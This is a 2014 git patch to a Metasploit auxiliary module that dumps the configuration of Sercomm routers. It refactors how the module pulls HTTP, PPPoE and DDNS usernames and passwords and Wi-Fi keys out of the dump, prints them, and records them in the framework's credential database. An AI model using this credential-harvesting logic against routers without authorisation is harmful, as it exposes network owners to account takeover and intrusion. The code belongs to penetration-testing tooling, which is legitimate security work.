From d9e737c3ab0392237f99f8041bb551d5193356e5 Mon Sep 17 00:00:00 2001
From: Matt Andreko <mandreko@gmail.com>
Date: Thu, 9 Jan 2014 10:14:34 -0500
Subject: [PATCH] Code Review Feedback

Refactored the configuration settings so that creds could be reported to
the database more easily, while still being able to print general
configuration settings separately.
---
 .../admin/sercomm/sercomm_dump_config.rb      | 66 ++++++++++++++-----
 1 file changed, 48 insertions(+), 18 deletions(-)

diff --git a/modules/auxiliary/admin/sercomm/sercomm_dump_config.rb b/modules/auxiliary/admin/sercomm/sercomm_dump_config.rb
index 529b9b4f4a..817476d028 100644
--- a/modules/auxiliary/admin/sercomm/sercomm_dump_config.rb
+++ b/modules/auxiliary/admin/sercomm/sercomm_dump_config.rb
@@ -31,20 +31,20 @@ class Metasploit3 < Msf::Auxiliary
         ], self.class)
   end
 
-  Settings = [
-      [/http_username=(\S+)/i, "HTTP Username"],
-      [/http_password=(\S+)/i, "HTTP Password"],
-      [/pppoe_username=(\S+)/i, "PPPOE Username"],
-      [/pppoe_password=(\S+)/i, "PPPOE Password"],
-      [/ddns_service_provider=(\S+)/i, "DynDNS Provider"],
-      [/ddns_user_name=(\S+)/i, "DynDNS Username"],
-      [/ddns_password=(\S+)/i, "DynDNS Password"],
-      [/wifi_ssid=(\S+)/i, "Wifi SSID"],
-      [/wifi_key1=(\S+)/i, "Wifi Key1"],
-      [/wifi_key2=(\S+)/i, "Wifi Key2"],
-      [/wifi_key3=(\S+)/i, "Wifi Key3"],
-      [/wifi_key4=(\S+)/i, "Wifi Key4"]
+  Settings = {
+    'Creds' => [
+      [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ],
+      [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],
+      [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ],
+    ],
+    'General' => [
+      ['Wifi SSID', /wifi_ssid=(\S+)/i],
+      ['Wifi Key 1', /wifi_key1=(\S+)/i],
+      ['Wifi Key 2', /wifi_key2=(\S+)/i],
+      ['Wifi Key 3', /wifi_key3=(\S+)/i],
+      ['Wifi Key 4', /wifi_key4=(\S+)/i]
     ]
+  }
 
   def run
 
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
     print_status("Router configuration dump stored in: #{loot_file}")
 
     configs = response.split(?\x00)
-    
+
     if (datastore['VERBOSE'])
       vprint_status('All configuration values:')
       configs.sort.each do |i|
@@ -80,14 +80,44 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
 
-    # print some useful data sets
-    Settings.each do |regex|
+    Settings['General'].each do |regex|
       configs.each do |config|
-        if config.match(regex[0])
+        if config.match(regex[1])
           value = $1
-          print_status("#{regex[1]}: #{value}")
+          print_status("#{regex[0]}: #{value}")
         end
       end
     end
+
+    Settings['Creds'].each do |cred|
+      user = nil
+      pass = nil
+
+      # find the user/pass
+      configs.each do |config|
+        if config.match(cred[1]['user'])
+          user = $1
+        end
+        if config.match(cred[1]['pass'])
+          pass = $1
+        end
+      end
+
+      # if user and pass are specified, report on them
+      if user and pass
+        print_status("#{cred[0]}: User: #{user} Pass: #{pass}")
+        auth = {
+          :host => rhost,
+          :port => rport,
+          :user => user,
+          :pass => pass,
+          :type => 'password',
+          :source_type => "exploit",
+          :active => true
+        }
+        report_auth_info(auth)
+      end
+    end
+
   end
 end